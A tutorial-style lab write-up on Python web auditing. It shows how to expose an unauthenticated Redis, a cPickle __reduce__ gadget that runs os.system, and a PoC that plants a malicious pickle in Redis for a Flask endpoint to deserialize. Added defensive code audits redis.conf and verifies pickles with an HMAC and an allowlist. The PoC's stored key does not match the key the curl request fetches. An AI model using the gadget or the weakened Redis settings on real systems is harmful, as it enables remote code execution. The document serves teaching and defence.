Python Web Auditing: A Summary of Worked Examples


1. Overview of Python code auditing
2. Setting up an unauthenticated Redis
3. Python cPickle deserialization vulnerability
4. Exploiting Redis + cPickle deserialization

1. Overview of Python code auditing

Reference: https://github.com/bit4woo/python_sec (the summary on that site is very thorough)

2. Setting up an unauthenticated Redis

https://www.huangdc.com/443
https://www.freebuf.com/vuls/162035.html

Allow connections from other hosts and disable protected mode by commenting out the bind line (limited by my setup, I did not test this from an external machine):

#bind 127.0.0.1 ::1
protected-mode no
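As an added example (not from the original post), the following Python 3 script checks a redis.conf for exactly the state the two lines above create: no active bind line, protected-mode off and no requirepass, which together make the instance reachable from the network without authentication. The parse_redis_conf and audit_redis_conf functions and the two sample configurations are constructed for this illustration; the hardened sample uses a placeholder password.

```python
"""Audit a redis.conf for the unauthenticated-access combination."""

# Constructed sample mirroring the post: bind commented out, protected mode off,
# no password configured.
WEAK_CONF = """\
# bind 127.0.0.1 ::1
protected-mode no
port 6379
# requirepass foobared
"""

# Constructed hardened counterpart (requirepass value is a placeholder).
HARDENED_CONF = """\
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass CHANGE-ME-PLACEHOLDER
"""

# bind tokens that expose the listener on every interface
WILDCARD_BINDS = {"0.0.0.0", "::", "*", "::*"}


def parse_redis_conf(text):
    """Return {directive: [value, ...]} for active (uncommented) lines.

    Redis keeps the last occurrence of a directive, so values are collected in
    order and callers look at the last one.
    """
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank or commented out: not active
        parts = line.split(None, 1)
        name = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        directives.setdefault(name, []).append(value)
    return directives


def audit_redis_conf(text):
    """Return a list of findings; an empty list means nothing was flagged."""
    conf = parse_redis_conf(text)
    findings = []

    binds = conf.get("bind", [])
    # No bind line at all means Redis listens on all interfaces.
    bound_everywhere = not binds or any(
        tok.lstrip("-") in WILDCARD_BINDS for tok in binds[-1].split()
    )
    if bound_everywhere:
        findings.append("bind: listening on all interfaces (no bind line or wildcard)")

    protected = conf.get("protected-mode", ["yes"])[-1].lower()
    if protected == "no":
        findings.append("protected-mode: disabled")

    has_password = bool(conf.get("requirepass"))
    if not has_password:
        findings.append("requirepass: not set (unauthenticated access)")

    if bound_everywhere and protected == "no" and not has_password:
        findings.append("CRITICAL: instance reachable from the network without authentication")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or ["no findings"])
```

The check deliberately treats a missing bind line as a finding: protected mode is the only thing standing between such an instance and the network, and the post turns that off as well. Running this against the running instance's redis.conf before and after the change shows the audit moving from four findings to none.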

3. Python cPickle deserialization vulnerability

Reference: https://blog.csdn.net/SKI_12/article/details/85015803

#!/usr/bin/env python
# Python 2: __reduce__ tells cPickle to rebuild the object by calling os.system("ls /"),
# so the command runs as a side effect of cPickle.loads()
import cPickle
import os

class exp(object):
    def __reduce__(self):
        s = """ls /"""
        return (os.system, (s,))

e = exp()
s = cPickle.dumps(e)   # serializing only records os.system and its argument
cPickle.loads(s)       # deserializing executes ls /

4. Exploiting Redis + cPickle deserialization

Reference: https://www.leavesongs.com/PENETRATION/zhangyue-python-web-code-execute.html

Setting up a simple service:

from flask import Flask
from flask import request
import cPickle
import redis

app = Flask(__name__)

@app.route('/')
def hello_world():
    # Pickle the ?key= parameter and store it in Redis under a key of the same name
    redis_key = request.args.get("key")
    print(redis_key)
    s = cPickle.dumps(redis_key)
    print(s)
    r = redis.Redis(host='127.0.0.1', port=6379, db=0)
    r.set(redis_key, s)
    return "stored"

@app.route('/test')
def hello_world2():
    # Read the key named by ?key_test= and unpickle whatever Redis holds:
    # this is the vulnerable step, since anyone who can write to Redis
    # controls the bytes passed to cPickle.loads
    redis_key = request.args.get("key_test")
    r = redis.Redis(host='127.0.0.1', port=6379, db=0)
    result = r.get(redis_key)
    s = cPickle.loads(result)
    print(s)
    return str(s)

if __name__ == '__main__':
    app.run()

PoC: store the payload in Redis

#!/usr/bin/env python
# Write a pickle whose __reduce__ resolves to os.system("ls -la") into Redis,
# under a key the /test endpoint will later pass to cPickle.loads
import cPickle
import os
import redis

class exp(object):
    def __reduce__(self):
        s = """ls -la"""
        return (os.system, (s,))

e = exp()
s = cPickle.dumps(e)

r = redis.Redis(host='127.0.0.1', port=6379, db=0)
r.set("key_test2", s)

Send the curl request; the stored bytes are deserialized:

curl -v http://127.0.0.1:5000/test?key_test=key_test1

Checking the server side, ls -la has been executed.
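The /test endpoint above, like the cPickle snippet in section 3, trusts whatever bytes Redis returns. As an added example written for this page (Python 3, not code from the original post or the referenced articles), here is the defensive counterpart for both: the blob written to Redis carries an HMAC over the serialized bytes, and reading goes through an Unpickler whose find_class resolves only an allowlist, so os.system (pickled as posix.system on Linux, nt.system on Windows) cannot be resolved even from a blob that carries a valid tag. FakeRedis is a constructed in-memory stand-in for redis.Redis, SECRET_KEY is a placeholder, and Exp mirrors the post's payload class with a harmless echo command.

```python
"""Signed and allowlisted replacement for cPickle.loads(r.get(key))."""
import hashlib
import hmac
import io
import os
import pickle

SECRET_KEY = b"placeholder-rotate-me"   # assumption: real deployments load this from configuration
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes of HMAC-SHA256 prefix the payload

# (module, name) pairs an unpickled object may reference; anything else is refused.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))


def restricted_loads(data):
    """pickle.loads replacement that only resolves allowlisted globals."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def signed_dumps(obj, key=SECRET_KEY):
    """Serialize obj and prefix it with HMAC-SHA256(key, payload)."""
    payload = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return tag + payload


def verified_loads(blob, key=SECRET_KEY):
    """Verify the tag in constant time, then unpickle through the allowlist."""
    if blob is None or len(blob) < TAG_LEN:
        raise ValueError("missing or truncated blob")
    tag, payload = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("HMAC mismatch: blob was not written by this application")
    return restricted_loads(payload)


class FakeRedis:
    """Constructed in-memory stand-in for redis.Redis (get/set only)."""

    def __init__(self):
        self._store = {}

    def set(self, key, value):
        self._store[key] = value

    def get(self, key):
        return self._store.get(key)


class Exp:
    """Same shape as the post's payload class, with a harmless command."""

    def __reduce__(self):
        return (os.system, ("echo pickle-executed",))


def demo():
    """Exercise the application write path and the attacker write path."""
    r = FakeRedis()
    outcomes = {}

    # Application write path: a signed blob, accepted on read.
    r.set("key_test1", signed_dumps({"user": "alice", "roles": ["reader"]}))
    outcomes["legit"] = verified_loads(r.get("key_test1"))

    # Attacker write path (the PoC above): an unsigned gadget blob is rejected
    # before any unpickling happens.
    r.set("key_test2", pickle.dumps(Exp()))
    try:
        verified_loads(r.get("key_test2"))
        outcomes["forged"] = "accepted"
    except ValueError:
        outcomes["forged"] = "rejected-hmac"

    # Second layer: even with the HMAC bypassed, the allowlist refuses posix.system.
    try:
        restricted_loads(pickle.dumps(Exp()))
        outcomes["restricted"] = "executed"
    except pickle.UnpicklingError:
        outcomes["restricted"] = "rejected-allowlist"
    return outcomes


if __name__ == "__main__":
    print(demo())
```

The HMAC is what actually stops an attacker with write access to an unauthenticated Redis: the /test handler would call verified_loads instead of cPickle.loads and refuse the PoC's blob. The allowlist is the fallback for the day the key leaks. Where the cached data is only dicts, lists and strings, as in the post's service, storing JSON instead of pickle removes the deserialization gadget surface altogether.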

2019.9.15
